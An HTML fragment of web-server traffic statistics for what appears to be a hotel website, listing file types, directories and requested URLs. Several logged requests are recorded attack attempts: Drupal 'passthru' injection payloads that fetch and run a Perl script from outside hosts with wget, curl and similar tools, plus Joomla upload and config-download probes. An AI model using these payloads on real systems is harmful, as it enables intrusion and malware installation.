<tr><td class="R">23707</td><td class="b">26.70%</td><td class="xl">[directories]</td></tr>
<tr><td class="R">13671</td><td class="b">15.05%</td><td class="xl">[no extension]</td></tr>
<tr><td class="R">3452</td><td class="b">12.90%</td><td class="xl">.jpg  [JPEG graphics]</td></tr>
<tr><td class="R">8444</td><td class="b"> 5.62%</td><td class="xl">.css  [Cascading Style Sheets]</td></tr>
<tr><td class="R">3745</td><td class="b"> 3.93%</td><td class="xl">.php  [PHP]</td></tr>
<tr><td class="R">7911</td><td class="b"> 2.09%</td><td class="xl">.png  [PNG graphics]</td></tr>
<tr><td class="R">105</td><td class="b"> 0.48%</td><td class="xl">.swf</td></tr>
<tr><td class="R">1820</td><td class="b"> 0.34%</td><td class="xl">.html [Hypertext Markup Language]</td></tr>
<tr><td class="R">976</td><td class="b"> 0.08%</td><td class="xl">[not listed: 2 extensions]</td></tr>
</tbody></table>
</div><div class="dir"><h2><a name="dir" id="dir">Directory Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | Directory Report | <a href="#req">Request Report</a>)</p>
<p><img src="./dir.png" alt="" /></p>
<p class="whatinc">
Listing directories with at least 0.01% of the traffic, sorted by the amount of traffic.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">directory</th></tr></thead>
<tbody><tr><td class="R">40583</td><td class="b">54.28%</td><td class="xl">/assets/</td></tr>
<tr><td class="R">39710</td><td class="b">43.77%</td><td class="xl">[root directory]</td></tr>
<tr><td class="R">1866</td><td class="b"> 1.68%</td><td class="xl">/facilities/</td></tr>
<tr><td class="R">150</td><td class="b"> 0.23%</td><td class="xl">/contact-us/</td></tr>
<tr><td class="R">43</td><td class="b"> 0.05%</td><td class="xl">/index.php/</td></tr>
<tr><td class="R">1</td><td class="b">&nbsp;</td><td class="xl">[not listed: 1 directory]</td></tr>
</tbody></table>
</div><div class="req"><h2><a name="req" id="req">Request Report</a></h2>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | Request Report)</p>
<p><img src="./req.png" alt="" /></p>
<p class="whatinc">
Listing files with at least 20 requests, sorted by the number of requests.</p>
<table>
<thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="D">last time</th><th class="xl">file</th></tr></thead>
<tbody><tr><td class="R">23540</td><td class="b">26.46%</td><td class="D">Apr/30/19  4:19 PM</td><td class="xl"><a href="/">/</a></td></tr>
<tr class="sub level2"><td class="R">215</td><td class="b"> 0.25%</td><td class="D">Apr/30/19  1:47 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?id=1">/?id=1</a></td></tr>
<tr class="sub level2"><td class="R">101</td><td class="b"> 0.11%</td><td class="D">Feb/12/19  6:05 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?172.68.211.147">/?172.68.211.147</a></td></tr>
<tr class="sub level2"><td class="R">86</td><td class="b"> 0.10%</td><td class="D">Apr/11/19  2:07 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?q=file/ajax/name/%23value/">/?q=file/ajax/name/#value/</a></td></tr>
<tr class="sub level2"><td class="R">33</td><td class="b"> 0.04%</td><td class="D">Apr/29/19  7:58 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=1">/?author=1</a></td></tr>
<tr class="sub level2"><td class="R">31</td><td class="b"> 0.04%</td><td class="D">Apr/16/19  3:00 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?q=user/register">/?q=user/register</a></td></tr>
<tr class="sub level2"><td class="R">29</td><td class="b"> 0.03%</td><td class="D">Apr/29/19  7:58 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=10">/?author=10</a></td></tr>
<tr class="sub level2"><td class="R">29</td><td class="b"> 0.03%</td><td class="D">Apr/29/19  7:58 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=11">/?author=11</a></td></tr>
<tr class="sub level2"><td class="R">29</td><td class="b"> 0.03%</td><td class="D">Apr/29/19  7:58 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=12">/?author=12</a></td></tr>
<tr class="sub level2"><td class="R">29</td><td class="b"> 0.03%</td><td class="D">Apr/29/19  7:58 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=13">/?author=13</a></td></tr>
<tr class="sub level2"><td class="R">29</td><td class="b"> 0.03%</td><td class="D">Apr/29/19  7:58 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=14">/?author=14</a></td></tr>
<tr class="sub level2"><td class="R">29</td><td class="b"> 0.03%</td><td class="D">Apr/29/19  7:58 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=15">/?author=15</a></td></tr>
<tr class="sub level2"><td class="R">29</td><td class="b"> 0.03%</td><td class="D">Apr/29/19  7:58 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=2">/?author=2</a></td></tr>
<tr class="sub level2"><td class="R">29</td><td class="b"> 0.03%</td><td class="D">Apr/29/19  7:58 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=3">/?author=3</a></td></tr>
<tr class="sub level2"><td class="R">29</td><td class="b"> 0.03%</td><td class="D">Apr/29/19  7:58 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=4">/?author=4</a></td></tr>
<tr class="sub level2"><td class="R">29</td><td class="b"> 0.03%</td><td class="D">Apr/29/19  7:58 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=5">/?author=5</a></td></tr>
<tr class="sub level2"><td class="R">29</td><td class="b"> 0.03%</td><td class="D">Apr/29/19  7:58 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=6">/?author=6</a></td></tr>
<tr class="sub level2"><td class="R">29</td><td class="b"> 0.03%</td><td class="D">Apr/29/19  7:58 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=7">/?author=7</a></td></tr>
<tr class="sub level2"><td class="R">29</td><td class="b"> 0.03%</td><td class="D">Apr/29/19  7:58 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=8">/?author=8</a></td></tr>
<tr class="sub level2"><td class="R">29</td><td class="b"> 0.03%</td><td class="D">Apr/29/19  7:58 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?author=9">/?author=9</a></td></tr>
<tr class="sub level2"><td class="R">24</td><td class="b"> 0.03%</td><td class="D">Apr/16/19  3:00 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?q=node/add">/?q=node/add</a></td></tr>
<tr class="sub level2"><td class="R">17</td><td class="b"> 0.02%</td><td class="D">Mar/24/19  5:44 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?172.68.27.13">/?172.68.27.13</a></td></tr>
<tr class="sub level2"><td class="R">16</td><td class="b"> 0.02%</td><td class="D">Apr/11/19  2:07 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?q=user/password&amp;name%5B%23post_render%5D%5B%5D=passthru&amp;name%5B%23markup%5D=crontab%20-r%20;%20killall%20-9%20perl%20;%20cd%20/tmp/%20;%20wget%20http://31.184.195.114/index.log.2018.06.26%20;%20perl%20index.log.2018.06.26%20;%20rm%20-rf%20index.log.%2A%20;%20fetch%20http://31.184.195.114/index.log.2018.06.26%20;%20lwp-download%20http://31.184.195.114/index.log.2018.06.26%20;%20curl%20-O%20http://31.184.195.114/index.log.2018.06.26%20;%20perl%20index.log.2018.06.26%20;%20rm%20-rf%20index.log.%2A%20;%20crontab%20-r&amp;name%5B%23type%5D=markup">/?q=user/password&amp;name[#post_render][]=passthru&amp;name[#markup]=crontab -r ; killall -9 perl ; cd /tmp/ ; wget http://31.184.195.114/index.log.2018.06.26 ; perl index.log.2018.06.26 ; rm -rf index.log.* ; fetch http://31.184.195.114/index.log.2018.06.26 ; lwp-download http://31.184.195.114/index.log.2018.06.26 ; curl -O http://31.184.195.114/index.log.2018.06.26 ; perl index.log.2018.06.26 ; rm -rf index.log.* ; crontab -r&amp;name[#type]=markup</a></td></tr>
<tr class="sub level2"><td class="R">16</td><td class="b"> 0.02%</td><td class="D">Apr/23/19  6:05 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?46.101.9.216">/?46.101.9.216</a></td></tr>
<tr class="sub level2"><td class="R">14</td><td class="b"> 0.02%</td><td class="D">May/14/18  4:47 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?q=user/password&amp;name%5B%23post_render%5D%5B%5D=passthru&amp;name%5B%23type%5D=markup&amp;name%5B%23markup%5D=uname+-a">/?q=user/password&amp;name[#post_render][]=passthru&amp;name[#type]=markup&amp;name[#markup]=uname+-a</a></td></tr>
<tr class="sub level2"><td class="R">13</td><td class="b"> 0.01%</td><td class="D">Dec/ 8/18  4:01 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?q=user/password&amp;name%5B%23post_render%5D%5B%5D=passthru&amp;name%5B%23markup%5D=%20cd%20/tmp/%20;%20wget%20http://31.184.195.89/index.log.2018.06.26%20;%20perl%20index.log.2018.06.26%20;%20rm%20-rf%20index.log.%2A%20;%20fetch%20http://31.184.195.89/index.log.2018.06.26%20;%20lwp-download%20http://31.184.195.89/index.log.2018.06.26%20;%20curl%20-O%20http://31.184.195.89/index.log.2018.06.26%20;%20perl%20index.log.2018.06.26%20;%20rm%20-rf%20index.log.%2A%20;%20crontab%20-r&amp;name%5B%23type%5D=markup">/?q=user/password&amp;name[#post_render][]=passthru&amp;name[#markup]= cd /tmp/ ; wget http://31.184.195.89/index.log.2018.06.26 ; perl index.log.2018.06.26 ; rm -rf index.log.* ; fetch http://31.184.195.89/index.log.2018.06.26 ; lwp-download http://31.184.195.89/index.log.2018.06.26 ; curl -O http://31.184.195.89/index.log.2018.06.26 ; perl index.log.2018.06.26 ; rm -rf index.log.* ; crontab -r&amp;name[#type]=markup</a></td></tr>
<tr class="sub level2"><td class="R">10</td><td class="b"> 0.01%</td><td class="D">Mar/10/19  4:26 PM</td><td class="xl">&nbsp;&nbsp;<a href="/?q=node/99/delete&amp;destination=node?q%5B%2523%5D%5B%5D=passthru%26q%5B%2523type%5D=markup%26q%5B%2523markup%5D=id;uname+-a">/?q=node/99/delete&amp;destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=id;uname+-a</a></td></tr>
<tr class="sub level2"><td class="R">10</td><td class="b"> 0.01%</td><td class="D">Feb/20/19  4:29 AM</td><td class="xl">&nbsp;&nbsp;<a href="/?q=user/password&amp;name%5B%23post_render%5D%5B%5D=passthru&amp;name%5B%23markup%5D=crontab%20-r%20;%20killall%20-9%20perl%20;%20cd%20/tmp/%20;%20wget%20http://31.184.195.89/index.log.2018.06.26%20;%20perl%20index.log.2018.06.26%20;%20rm%20-rf%20index.log.%2A%20;%20fetch%20http://31.184.195.89/index.log.2018.06.26%20;%20lwp-download%20http://31.184.195.89/index.log.2018.06.26%20;%20curl%20-O%20http://31.184.195.89/index.log.2018.06.26%20;%20perl%20index.log.2018.06.26%20;%20rm%20-rf%20index.log.%2A%20;%20crontab%20-r&amp;name%5B%23type%5D=markup">/?q=user/password&amp;name[#post_render][]=passthru&amp;name[#markup]=crontab -r ; killall -9 perl ; cd /tmp/ ; wget http://31.184.195.89/index.log.2018.06.26 ; perl index.log.2018.06.26 ; rm -rf index.log.* ; fetch http://31.184.195.89/index.log.2018.06.26 ; lwp-download http://31.184.195.89/index.log.2018.06.26 ; curl -O http://31.184.195.89/index.log.2018.06.26 ; perl index.log.2018.06.26 ; rm -rf index.log.* ; crontab -r&amp;name[#type]=markup</a></td></tr>
<tr><td class="R">2085</td><td class="b"> 3.09%</td><td class="D">Apr/30/19  6:00 AM</td><td class="xl">/contact-us</td></tr>
<tr><td class="R">1958</td><td class="b"> 2.01%</td><td class="D">Apr/30/19  7:21 AM</td><td class="xl">/accommodation</td></tr>
<tr><td class="R">1920</td><td class="b"> 2.72%</td><td class="D">Apr/30/19  7:21 AM</td><td class="xl">/gallery</td></tr>
<tr><td class="R">1610</td><td class="b"> 0.78%</td><td class="D">Apr/30/19 10:59 AM</td><td class="xl">/assets/js/misc/drupal.js</td></tr>
<tr class="sub level2"><td class="R">1210</td><td class="b"> 0.56%</td><td class="D">Dec/23/18 10:50 AM</td><td class="xl">&nbsp;&nbsp;/assets/js/misc/drupal.js?nsbnfj</td></tr>
<tr><td class="R">1491</td><td class="b"> 0.12%</td><td class="D">Apr/30/19  7:04 AM</td><td class="xl">/assets/img/logo_main.png</td></tr>
<tr><td class="R">1348</td><td class="b"> 1.22%</td><td class="D">Apr/30/19  9:30 AM</td><td class="xl">/location</td></tr>
<tr><td class="R">1332</td><td class="b">19.15%</td><td class="D">Apr/30/19  7:21 AM</td><td class="xl">/assets/js/jquery-ui.js</td></tr>
<tr><td class="R">1296</td><td class="b"> 0.48%</td><td class="D">Apr/30/19  7:21 AM</td><td class="xl">/assets/js/modernizr.min.js</td></tr>
<tr><td class="R">1283</td><td class="b"> 0.92%</td><td class="D">Apr/30/19  7:21 AM</td><td class="xl">/assets/js/owl.carousel.min.js</td></tr>
<tr><td class="R">1272</td><td class="b"> 3.55%</td><td class="D">Apr/30/19  7:21 AM</td><td class="xl">/assets/js/jquery-1.11.2.min.js</td></tr>
<tr><td class="R">1242</td><td class="b"> 0.28%</td><td class="D">Apr/30/19 12:30 PM</td><td class="xl">/assets/js/cssmin.js</td></tr>
<tr><td class="R">1239</td><td class="b"> 0.09%</td><td class="D">Apr/30/19  7:04 AM</td><td class="xl">/assets/js/lazyloadxt.min.js</td></tr>
<tr><td class="R">1239</td><td class="b"> 1.34%</td><td class="D">Apr/30/19 12:30 PM</td><td class="xl">/assets/js/bootstrap.min.js</td></tr>
<tr><td class="R">1221</td><td class="b"> 0.19%</td><td class="D">Apr/30/19  7:04 AM</td><td class="xl">/assets/js/jquery.bootstrap.newsbox.min.js</td></tr>
<tr><td class="R">1212</td><td class="b"> 0.01%</td><td class="D">Apr/30/19  7:04 AM</td><td class="xl">/assets/js/lazyloadxt.bg.min.js</td></tr>
<tr><td class="R">1206</td><td class="b"> 1.02%</td><td class="D">Apr/29/19  8:39 AM</td><td class="xl">/assets/js/jquery.nivo.slider.js</td></tr>
<tr><td class="R">1206</td><td class="b"> 0.07%</td><td class="D">Apr/30/19 12:30 PM</td><td class="xl">/assets/js/responsive_navigation_firs.js</td></tr>
<tr><td class="R">1198</td><td class="b"> 0.49%</td><td class="D">Apr/30/19  7:04 AM</td><td class="xl">/assets/js/scripts.js</td></tr>
<tr><td class="R">1133</td><td class="b"> 1.02%</td><td class="D">Apr/30/19  7:21 AM</td><td class="xl">/promotions</td></tr>
<tr><td class="R">983</td><td class="b"> 0.03%</td><td class="D">Apr/30/19  7:04 AM</td><td class="xl">/assets/css/fonts.css</td></tr>
<tr><td class="R">967</td><td class="b"> 0.83%</td><td class="D">Apr/30/19 12:01 PM</td><td class="xl">/about-us</td></tr>
<tr><td class="R">964</td><td class="b"> 0.11%</td><td class="D">Apr/30/19  7:04 AM</td><td class="xl">/assets/css/styles.css</td></tr>
<tr><td class="R">942</td><td class="b"> 3.27%</td><td class="D">Apr/29/19  3:10 PM</td><td class="xl">/assets/css/firs_main.css</td></tr>
<tr><td class="R">900</td><td class="b"> 0.65%</td><td class="D">Apr/30/19  7:04 AM</td><td class="xl">/assets/css/responsive.css</td></tr>
<tr><td class="R">899</td><td class="b"> 0.82%</td><td class="D">Apr/30/19 11:27 AM</td><td class="xl">/facilities/restaurant</td></tr>
<tr><td class="R">886</td><td class="b"> 1.07%</td><td class="D">Apr/30/19  7:04 AM</td><td class="xl">/assets/css/jquery-ui.css</td></tr>
<tr><td class="R">850</td><td class="b"> 0.11%</td><td class="D">Apr/29/19 11:45 AM</td><td class="xl">/assets/css/accordian.css</td></tr>
<tr><td class="R">839</td><td class="b"> 0.06%</td><td class="D">Apr/30/19  7:04 AM</td><td class="xl">/assets/owl-carousel/owl.theme.css</td></tr>
<tr><td class="R">828</td><td class="b"> 0.84%</td><td class="D">Apr/30/19  7:21 AM</td><td class="xl">/facilities</td></tr>
<tr><td class="R">819</td><td class="b"> 0.05%</td><td class="D">Apr/30/19  7:04 AM</td><td class="xl">/assets/owl-carousel/owl.carousel.css</td></tr>
<tr><td class="R">787</td><td class="b"> 0.22%</td><td class="D">Apr/30/19  7:04 AM</td><td class="xl">/assets/css/magnific-popup.css</td></tr>
<tr><td class="R">760</td><td class="b"> 0.66%</td><td class="D">Apr/30/19  7:21 AM</td><td class="xl">/facilities/room-service</td></tr>
<tr><td class="R">688</td><td class="b"> 0.16%</td><td class="D">Apr/30/19  4:25 PM</td><td class="xl"><a href="/assets/360/lobby-home.html">/assets/360/lobby-home.html</a></td></tr>
<tr><td class="R">680</td><td class="b"> 0.09%</td><td class="D">Apr/30/19  1:42 PM</td><td class="xl">/assets/img/favicon.png</td></tr>
<tr><td class="R">669</td><td class="b"> 0.01%</td><td class="D">Apr/30/19  7:04 AM</td><td class="xl">/assets/img/icon.png</td></tr>
<tr><td class="R">661</td><td class="b"> 0.21%</td><td class="D">Apr/30/19  7:04 AM</td><td class="xl">/assets/img/logo.png</td></tr>
<tr><td class="R">657</td><td class="b"> 0.75%</td><td class="D">Apr/30/19  4:29 AM</td><td class="xl">/index.php</td></tr>
<tr class="sub level2"><td class="R">67</td><td class="b"> 0.08%</td><td class="D">Apr/24/19  8:49 AM</td><td class="xl">&nbsp;&nbsp;/index.php?option=com_jce&amp;task=plugin&amp;plugin=imgmanager&amp;file=imgmanager&amp;method=form</td></tr>
<tr class="sub level2"><td class="R">53</td><td class="b"> 0.06%</td><td class="D">Apr/24/19  8:51 AM</td><td class="xl">&nbsp;&nbsp;/index.php?option=com_adsmanager&amp;task=upload&amp;tmpl=component</td></tr>
<tr class="sub level2"><td class="R">47</td><td class="b"> 0.05%</td><td class="D">Apr/24/19  8:49 AM</td><td class="xl">&nbsp;&nbsp;/index.php?option=com_jdownloads&amp;Itemid=0&amp;view=upload</td></tr>
<tr class="sub level2"><td class="R">33</td><td class="b"> 0.04%</td><td class="D">Apr/24/19  8:49 AM</td><td class="xl">&nbsp;&nbsp;/index.php?option=com_joomanager&amp;controller=details&amp;task=download&amp;path=configuration.php</td></tr>
<tr class="sub level2"><td class="R">25</td><td class="b"> 0.03%</td><td class="D">Apr/30/19  4:29 AM</td><td class="xl">&nbsp;&nbsp;/index.php?m=member&amp;c=index&amp;a=register&amp;siteid=1</td></tr>
<tr class="sub level2"><td class="R">24</td><td class="b"> 0.03%</td><td class="D">Mar/25/19  2:38 PM</td><td class="xl">&nbsp;&nbsp;/index.php?option=com_myblog&amp;task=ajaxupload</td></tr>
<tr class="sub level2"><td class="R">21</td><td class="b"> 0.02%</td><td class="D">Mar/25/19  2:37 PM</td><td class="xl">&nbsp;&nbsp;/index.php?option=com_cckjseblod&amp;task=download&amp;file=configuration.php</td></tr>
<tr class="sub level2"><td class="R">21</td><td class="b"> 0.02%</td><td class="D">Mar/25/19  2:37 PM</td><td class="xl">&nbsp;&nbsp;/index.php?option=com_fabrik&amp;c=import&amp;view=import&amp;filetype=csv&amp;table=</td></tr>
<tr><td class="R">522</td><td class="b"> 0.48%</td><td class="D">Apr/30/19  5:23 PM</td><td class="xl">/downloads</td></tr>
<tr><td class="R">518</td><td class="b"> 0.55%</td><td class="D">Apr/30/19 12:10 AM</td><td class="xl">/privacy-policy</td></tr>
<tr><td class="R">494</td><td class="b"> 0.57%</td><td class="D">Apr/30/19 12:10 AM</td><td class="xl">/terms-and-conditions</td></tr>
<tr><td class="R">488</td><td class="b"> 0.05%</td><td class="D">Apr/30/19  7:04 AM</td><td class="xl">/assets/img/rght_arrow.png</td></tr>
<tr><td class="R">416</td><td class="b"> 0.03%</td><td class="D">Apr/29/19  1:06 AM</td><td class="xl">/assets/img/loading.gif</td></tr>
<tr><td class="R">408</td><td class="b"> 2.12%</td><td class="D">Apr/30/19  1:42 AM</td><td class="xl">/assets/js/jssor.slider.js</td></tr>
<tr><td class="R">398</td><td class="b"> 0.59%</td><td class="D">Apr/30/19  5:35 PM</td><td class="xl">/contact-us.php</td></tr>
<tr><td class="R">389</td><td class="b"> 1.07%</td><td class="D">Apr/30/19  1:42 AM</td><td class="xl">/assets/js/jssor.js</td></tr>
<tr><td class="R">376</td><td class="b"> 0.38%</td><td class="D">Apr/30/19  7:04 AM</td><td class="xl">/assets/img/firs_payment_methods.png</td></tr>
<tr><td class="R">327</td><td class="b"> 0.21%</td><td class="D">Apr/29/19  7:40 AM</td><td class="xl">/assets/js/jquery.magnific-popup.min.js</td></tr>
<tr><td class="R">306</td><td class="b"> 0.31%</td><td class="D">Apr/29/19 10:08 AM</td><td class="xl">/assets/js/jquery.colorbox.js</td></tr>
<tr><td class="R">297</td><td class="b"> 0.26%</td><td class="D">Apr/30/19  5:17 PM</td><td class="xl">/about-us.php</td></tr>
<tr><td class="R">273</td><td class="b"> 0.04%</td><td class="D">Apr/24/19 11:20 PM</td><td class="xl">/assets/img/a11.png</td></tr>
<tr><td class="R">272</td><td class="b"> 0.25%</td><td class="D">Apr/30/19  4:37 PM</td><td class="xl">/room-services.php</td></tr>
<tr><td class="R">270</td><td class="b"> 0.13%</td><td class="D">Apr/29/19  6:31 PM</td><td class="xl">/location.php</td></tr>
<tr><td class="R">269</td><td class="b"> 0.01%</td><td class="D">Apr/30/19  8:12 AM</td><td class="xl"><a href="/cont_pop.html">/cont_pop.html</a></td></tr>
<tr class="sub level2"><td class="R">10</td><td class="b">&nbsp;</td><td class="D">Apr/17/19  7:22 PM</td><td class="xl">&nbsp;&nbsp;<a href="/cont_pop.html?lightbox%5Bwidth%5D=800&amp;lightbox%5Bheight%5D=300">/cont_pop.html?lightbox[width]=800&amp;lightbox[height]=300</a></td></tr>
<tr><td class="R">269</td><td class="b"> 0.01%</td><td class="D">Apr/30/19  3:08 PM</td><td class="xl">/assets/img/contactus.png</td></tr>
<tr><td class="R">262</td><td class="b"> 0.01%</td><td class="D">Apr/25/19  3:07 PM</td><td class="xl">/assets/img/arrows.png</td></tr>
<tr><td class="R">261</td><td class="b"> 0.04%</td><td class="D">Apr/29/19  5:09 PM</td><td class="xl">/assets/css/colorbox.css</td></tr>
<tr><td class="R">259</td><td class="b"> 0.26%</td><td class="D">Apr/29/19  6:31 PM</td><td class="xl">/restaurant.php</td></tr>
<tr><td class="R">255</td><td class="b"> 0.06%</td><td class="D">Apr/24/19 11:09 AM</td><td class="xl"><a href="/assets/360/reinhart_room-home.html">/assets/360/reinhart_room-home.html</a></td></tr>
<tr><td class="R">255</td><td class="b"> 0.01%</td><td class="D">Apr/25/19  3:07 PM</td><td class="xl">/assets/img/bullets.png</td></tr>
<tr><td class="R">237</td><td class="b"> 0.14%</td><td class="D">Apr/24/19 11:08 AM</td><td class="xl">/assets/360/lobby/swfobject/swfkrpano.js</td></tr>
<tr><td class="R">232</td><td class="b"> 0.45%</td><td class="D">Apr/24/19 11:08 AM</td><td class="xl">/assets/360/js/jquery.carouFredSel-6.2.1-packed.js</td></tr>
<tr><td class="R">222</td><td class="b"> 0.23%</td><td class="D">Apr/30/19  8:13 AM</td><td class="xl">/accommodation.php</td></tr>
<tr><td class="R">220</td><td class="b"> 0.22%</td><td class="D">Apr/29/19  6:31 PM</td><td class="xl">/bar.php</td></tr>
<tr><td class="R">219</td><td class="b"> 1.31%</td><td class="D">Apr/27/19  9:01 PM</td><td class="xl">/assets/images/cont-us.jpg</td></tr>
<tr><td class="R">213</td><td class="b"> 0.01%</td><td class="D">Apr/24/19 11:08 AM</td><td class="xl">/assets/360/css/style.css</td></tr>
<tr><td class="R">211</td><td class="b">&nbsp;</td><td class="D">Apr/26/19 12:06 PM</td><td class="xl">/assets/img/map.png</td></tr>
<tr><td class="R">209</td><td class="b"> 0.30%</td><td class="D">Apr/29/19  6:31 PM</td><td class="xl">/gallery.php</td></tr>
<tr><td class="R">207</td><td class="b"> 0.01%</td><td class="D">Apr/29/19  6:31 PM</td><td class="xl"><a href="/map_pop.html">/map_pop.html</a></td></tr>
<tr><td class="R">203</td><td class="b"> 0.05%</td><td class="D">Apr/27/19  3:58 AM</td><td class="xl"><a href="/assets/360/molly_suite-home.html">/assets/360/molly_suite-home.html</a></td></tr>
<tr><td class="R">202</td><td class="b"> 0.24%</td><td class="D">Apr/28/19  5:28 PM</td><td class="xl">/terms-and-conditions.php</td></tr>
<tr><td class="R">198</td><td class="b"> 0.05%</td><td class="D">Apr/24/19 11:09 AM</td><td class="xl"><a href="/assets/360/stephan_suite-home.html">/assets/360/stephan_suite-home.html</a></td></tr>
<tr><td class="R">176</td><td class="b"> 0.19%</td><td class="D">Apr/24/19 11:08 AM</td><td class="xl">/assets/360/images/lobby.jpg</td></tr>
<tr><td class="R">173</td><td class="b"> 0.18%</td><td class="D">Apr/29/19  6:31 PM</td><td class="xl">/facilities.php</td></tr>
<tr><td class="R">173</td><td class="b"> 0.15%</td><td class="D">Apr/24/19 11:08 AM</td><td class="xl">/assets/360/images/stephan_suite.jpg</td></tr>
<tr><td class="R">171</td><td class="b"> 0.02%</td><td class="D">Apr/28/19  6:54 AM</td><td class="xl">/sitemap.xml</td></tr>
<tr><td class="R">170</td><td class="b"> 0.18%</td><td class="D">Apr/24/19 11:08 AM</td><td class="xl">/assets/360/images/reinhart_room.jpg</td></tr>
<tr><td class="R">169</td><td class="b"> 0.04%</td><td class="D">Apr/24/19 11:08 AM</td><td class="xl">/assets/360/images/hide-vertical.png</td></tr>
<tr><td class="R">168</td><td class="b">&nbsp;</td><td class="D">Apr/24/19 11:08 AM</td><td class="xl">/assets/360/images/callout.gif</td></tr>
<tr><td class="R">166</td><td class="b"> 0.23%</td><td class="D">Apr/24/19 11:08 AM</td><td class="xl">/assets/360/images/molly_suite.jpg</td></tr>
<tr><td class="R">164</td><td class="b"> 0.15%</td><td class="D">Apr/29/19  8:13 PM</td><td class="xl">/promotions.php</td></tr>
<tr><td class="R">164</td><td class="b"> 0.23%</td><td class="D">Apr/24/19 11:08 AM</td><td class="xl">/assets/360/images/firs-360.png</td></tr>
<tr><td class="R">162</td><td class="b"> 0.16%</td><td class="D">Apr/24/19 11:08 AM</td><td class="xl">/assets/360/images/bg_03.png</td></tr>
<tr><td class="R">161</td><td class="b"> 0.01%</td><td class="D">Apr/24/19 11:08 AM</td><td class="xl">/assets/360/images/show-vertical.png</td></tr>
<tr><td class="R">160</td><td class="b"> 0.10%</td><td class="D">Apr/28/19 12:41 AM</td><td class="xl">/assets/img/cal_rght.png</td></tr>
<tr><td class="R">157</td><td class="b">&nbsp;</td><td class="D">Apr/26/19 12:06 PM</td><td class="xl">/assets/css/images/overlay.png</td></tr>
<tr><td class="R">150</td><td class="b"> 0.23%</td><td class="D">Apr/24/19  6:43 AM</td><td class="xl"><a href="/contact-us/">/contact-us/</a></td></tr>
<tr><td class="R">146</td><td class="b"> 0.13%</td><td class="D">Apr/29/19 11:11 PM</td><td class="xl">/downloads.php</td></tr>
<tr><td class="R">145</td><td class="b"> 0.09%</td><td class="D">Apr/28/19 12:41 AM</td><td class="xl">/assets/img/cal_lft.png</td></tr>
<tr><td class="R">142</td><td class="b">&nbsp;</td><td class="D">Apr/28/19 12:41 AM</td><td class="xl">/assets/css/ui-bg_glass_65_ffffff_1x400.png</td></tr>
<tr><td class="R">133</td><td class="b"> 0.12%</td><td class="D">Apr/28/19  6:09 PM</td><td class="xl">/advance-purchase.php</td></tr>
<tr><td class="R">122</td><td class="b"> 0.13%</td><td class="D">Apr/29/19  8:10 PM</td><td class="xl">/privacy-policy.php</td></tr>
<tr><td class="R">89</td><td class="b"> 0.04%</td><td class="D">Apr/29/19  5:15 PM</td><td class="xl">/assets/img/back.jpg</td></tr>
<tr><td class="R">88</td><td class="b"> 0.15%</td><td class="D">Apr/29/19  5:14 PM</td><td class="xl">/assets/img/qr_back.png</td></tr>
<tr><td class="R">86</td><td class="b"> 0.25%</td><td class="D">Apr/29/19  5:15 PM</td><td class="xl">/assets/img/pop_contact_back.png</td></tr>
<tr><td class="R">72</td><td class="b">&nbsp;</td><td class="D">Apr/21/19  2:50 PM</td><td class="xl">/assets/owl-carousel/grabbing.png</td></tr>
<tr><td class="R">62</td><td class="b"> 0.01%</td><td class="D">Apr/21/19  2:53 PM</td><td class="xl">/assets/360/lobby/Output0.xml</td></tr>
<tr><td class="R">61</td><td class="b"> 0.01%</td><td class="D">Apr/21/19  2:53 PM</td><td class="xl">/assets/360/lobby/Output.xml</td></tr>
<tr><td class="R">47</td><td class="b"> 0.01%</td><td class="D">Apr/21/19  2:53 PM</td><td class="xl">/assets/360/lobby/Outputdata/graphics/menu/menu0.png</td></tr>
